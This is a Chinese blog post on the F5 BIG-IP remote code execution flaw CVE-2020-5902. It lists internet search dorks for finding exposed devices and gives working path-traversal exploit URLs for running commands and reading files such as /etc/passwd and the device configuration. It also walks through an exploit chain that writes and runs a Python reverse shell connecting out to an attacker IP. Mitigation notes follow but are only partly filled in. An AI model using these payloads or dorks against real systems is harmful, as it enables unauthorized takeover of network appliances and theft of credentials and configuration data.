F5 BIG-IP远程代码执行漏洞(CVE-2020-5902)

最新推荐文章于 2023-06-14 13:11:02 发布
最新推荐文章于 2023-06-14 13:11:02 发布
阅读量1.8k 收藏 3
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36197704/article/details/108141077
版权

1.影响范围

F5 BIG‐IP 15.1.0

F5 BIG‐IP 15.0.0

F5 BIG‐IP 14.1.0‐14.1.2

F5 BIG‐IP 13.1.0‐13.1.3

F5 BIG‐IP 12.1.0‐12.1.5

F5 BIG‐IP 11.6.1‐11.6.5

2.漏洞描述

       攻击者可利用该漏洞执行任意系统命令、创建或删除文件、禁用服务、执行任意的Java代码,可获取shell完全控制目标系统。

存在漏洞目标网站页面:

3.网络资产查找

(1)shodan

http.favicon.hash:‐335242539 http.title:"BIG‐IP®‐ Redirect"

(2)fofa

title="BIG‐IP®‐ Redirect"

(3)censys

443.https.get.body_sha256:5d78eb6fa93b995f9a39f90b6fb32f016e80dbcda8eb71a17994678692585ee

(4)5

443.https.get.title:"BIG‐IP®‐ Redirect"

(5)google

inurl:"tmui/login.jsp"

intitle:"BIG‐IP" inurl:"tmui"

4.漏洞利用

CVE-2020-5902 POC:

/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=AnyMsgHereWillBeReflectedInTheResponse curl ‐v ‐k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp? command=list+auth+user+admin'

Read File:

 curl ‐v ‐k 'https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp? fileName=/etc/passwd'

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf

 

exp:

(1) 修改alias劫持list命令为bash

/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash

(2)写入bash文件 /tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/xxx&content=id

(3)执行bash文件 /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/xxx

(4)还原list命令

/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list

 

5.漏洞复现

(1)F5 BIG-IP登录界面

 

(2)读取配置文件

(3)EXP利用:

修改alias劫持list命令为bash

https://xx.xx.xx.65:8443/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash

 

(4)写入bash文件

https://xx.xx.64.65:8443/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/shell&content=python%20-c%20%22import%20os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%27xx.xx.xx.105%27,1919));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([%27/bin/bash%27,%27-i%27]);%22

(5)执行bash文件,成功获取shell

https://xx.xx.xx.65:8443/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/shell

6.修复建议

目前厂商发布了该软件11.x版本,12.x版本,13.x版本,14.x版本和15.1.0版本的修复措施,15.0.0版 本的修复措施暂未发布。

临时措施:

All network interfaces:

为防止未经身份验证的攻击者利用此漏洞,请将LocationMatch配置元素添加到httpd。

请执行以下步骤:

注意:

经过身份验证的用户将仍然能够利用此漏洞,而无需考虑其特权级别。

(1)通过输入以下命令登录到TMOS Shell(tmsh):

Tmsh

(2)通过输入以下命令来编辑httpd属性:

edit /sys httpd all‐properties

(3)找到include部分并添加以下内容:

(4)输入以下命令,保存到配置文件中:

Esc :

wq!

(5)输入以下命令来保存配置:

save /sys config

(6) 输入以下命令重新启动httpd服务:

restart sys service httpd

Self IPs:

参考

https://github.com/jas502n/CVE‐2020‐5902

chaojixiaojingang
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
F5 BIG-IP Next Central Manager SQL注入漏洞(CVE-2024-26026、CVE-2024-21793)
0xSec
05-10 973
当启用 LDAP时,BIG-IP Next Central Manager 版本20.0.1 - 20.1.0的API (URI) 中存在OData 注入漏洞,该漏洞存在于Central Manager 处理 OData 查询的方式中,可能导致未经身份验证的威胁者注入OData 查询过滤器参数,从而获取敏感信息,如管理员密码哈希等。
F5 BIG-IP 16.0.0_Virtual-Edition Release (OVA only):.rar
11-02
F5 BIG-IP 16.0.0_Virtual-Edition Release (OVA only),网盘文件,永久连接 BIGIP-16.0.0-0.0.12.ALL-vmware
CVE-2020-5902: F5 BIG-IP 远程代码执行漏洞分析
爱国小白帽
07-15 1300
360-CERT [三六零CERT](javascript:void(0)???? 昨天 0x00 漏洞简述 2020年07月08日, 360CERT监测发现 F5 官方更新了 F5 BIG-IP 远程代码执行 的风险通告,该漏洞编号为 CVE-2020-5902漏洞等级:严重。 未授权的远程攻击者通过向漏洞页面发送特制的请求包,可以造成任意 Java 代码执行。进而控制 F5 BIG-IP 的全部功能,包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等,使用官方的httpd配置
BIG-IP ADC RCE漏洞(CVE-2020-5902)
qax
07-08 523
BIG-IP ADC RCE漏洞(CVE-2020-5902) F5(F5 Networks)作为全球领先的应用交付网络(ADN)领域的厂商,6月被曝出BIG-IP(负载均衡)中两个严重漏洞,代号分别为CVE-2020-5902CVE-2020-5903,就在上次HW期间,就见到过很多这个F5的设备,金融企业存在这种高危漏洞,想想都可怕。 一丶漏洞简介   该漏洞BIG-IP管理界面中称为“远程代码执行漏洞,称为TMUI(流量管理用户界面)。未经身份验证的攻击者可以通过将恶意制作的HTTP请
F5 BIG-IP iControl RCE (CVE-2021-22986)
MD@@nr丫卡uer
03-19 2500
漏洞描述 F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。 1、CVE-2021-22986 BIG-IP/BIG-IQ iControl REST 未授权远程代码执行漏洞 中,未经身份验证的攻击者可通过iControl REST接口,构造恶意请求,执行任意系统命令。 2、CVE-2021-22987 BIG-IP TMUI 后台远程代码执行漏洞 中,经过身份验证的用户可构造恶意请求,执行任意系统命令。 3、CVE-2021-22988 BIG
话说 F5-BIGIP
weixin_34232744的博客
02-02 135
随着3G和宽带接入的高速发展,移动网络带宽都有很快的增长。如此庞大的用户需求强烈刺激各类信息业务的发展,其中手机终端类型迅速增长,基于移动网络的增值业务种类繁多。对于移动运营商面临两个关键的挑战,首先,无线网络正面临核心网架构的调整,使其满足日益增长的签约用户和爆发式的新业务的出现;其次,移动网络运营商不得不面对日益丰富的新业务带来的商机,提供具有个性化的服务来更好的服务于客...
CVE-2020-5902 F5 BIG-IP TMUI 远程代码执行漏洞.md
04-23
CVE-2020-5902 F5 BIG-IP TMUI 远程代码执行漏洞
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行.md
04-23
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行
CVE-202122986-EXP:F5 BIG-IP远程代码执行cve-2021-22986,批量检测;命令执行利用
04-01
F5 BIG-IP远程命令执行突破(CVE-2021-22986) 进攻影响 F5 BIG-IP 16.x:16.1.0.3 F5 BIG-IP 15.x:15.1.0.4 F5 BIG-IP 14.x:14.1.2.6 F5 BIG-IP 13.x:13.1.3.4 F5 BIG-IP 12.x:12.1.5.2 F5 BIG-IP 11.x:...
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
F5_BIGIP_LTM详解
09-06
F5TMM平台内部结构、负载均衡原理详见、部署方式、配置用例。
F5 BIGip 负载均衡 IP算法解密工具
jast
08-05 1620
BIGip是对负载均衡的实现,主要通过Virtual Server、iRules、Pool、Node、Monitor和Persistent(会话保持)实现。BIGip在实现会话保持机制时会在用户首次发起请求时,会为用户设置一个cookie,即服务端会添加set-cookie响应头头(比如:Set-Cookie: BIGipServerFinanceAndAdminWebfo.unc.edu=110536896.20480.0000 )。后续的请求会判断并使用这个cookie值,服务端解码该cookie并使用
F5 BIGIP激活
weixin_34342578的博客
01-09 3787
什么是big-ip BIGIPF5的一个系列围绕软件和硬件组成的应用可用性的产品,接入控制和安全解决方案。 BIGIP主软件模块: BIGIP本地交通管理器(LTM) F5的全流量代理功能,LTM提供了创建虚拟服务器、性能、服务、协议、身份验证和安全配置文件以定义和塑造应用程序流量的平台。BIGIP家族中的大多数其他模块都使用LTM作为增强服务的基础。 BIGIP ...
F5 Big-IP真实IP泄露
最新发布
voctor2436的博客
06-14 1001
F5 BIG-IP 是美国 F5 公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。F5 Big-IP可以解码cookie,获取内网真实IP。3、6566656*从后至前,以此取四位数出来分别:*、65、66、65四个字段值。1、任意请求使用Burp Sutie发包,获取Set-Cookie字段值。4、将步骤3中字段值转换成16进制,分别*.101.102.*关注官方新版本的发布及更新,建议使用WAF进行防护。
F5设备中存在一个Ticketbleed漏洞,可被远程攻击者利用
weixin_34245169的博客
09-25 512
本文讲的是F5设备中存在一个Ticketbleed漏洞,可被远程攻击者利用, F5 Networks BIG-IP设备中存在一个严重漏洞漏洞编号为CVE-2016-9244。该漏洞被命名为Ticketbleed,可被远程攻击者利用于窃取内存中的敏感信息,包括敏感数据(比如SSL Session ID)。 受影响的F5 BIG-IP设备包括LTM、AA...
F5社区好文推荐:BIG-IP双机高可用配置
f5networks的博客
10-10 792
在生产级环境下,需考虑BIG-IP高可用。此时需CES对接BIG-IP AFM多实例集群。CES对接AFM集群有两种方式:
CVE-2022-1388-EXP(F5-BIGIP)
PolarPeak的博客
05-14 1006
简介 F5 BIG-IP 是美国``F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。 EXP POST /mgmt/tm/util/bash HTTP/1.1 Host: X-F5-Auth-Token: a Authorization: Basic YWRtaW46 Connection: keep-alive, x-F5-Auth-Token Content-Length: 0 Cache-Control: max-age=0 {
F5 BIG-IP IQ 2021漏洞CVE-2021-22986:远程代码执行风险
### CVE-2021-22986: F5 BIG-IP-IQ 的远程代码执行漏洞分析 **背景**: CVE-2021-22986是一个针对F5 BIG-IP设备及其附属产品BIG-IP IQ(Intelligence Query)的安全漏洞。该漏洞允许攻击者通过不安全的API调用,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值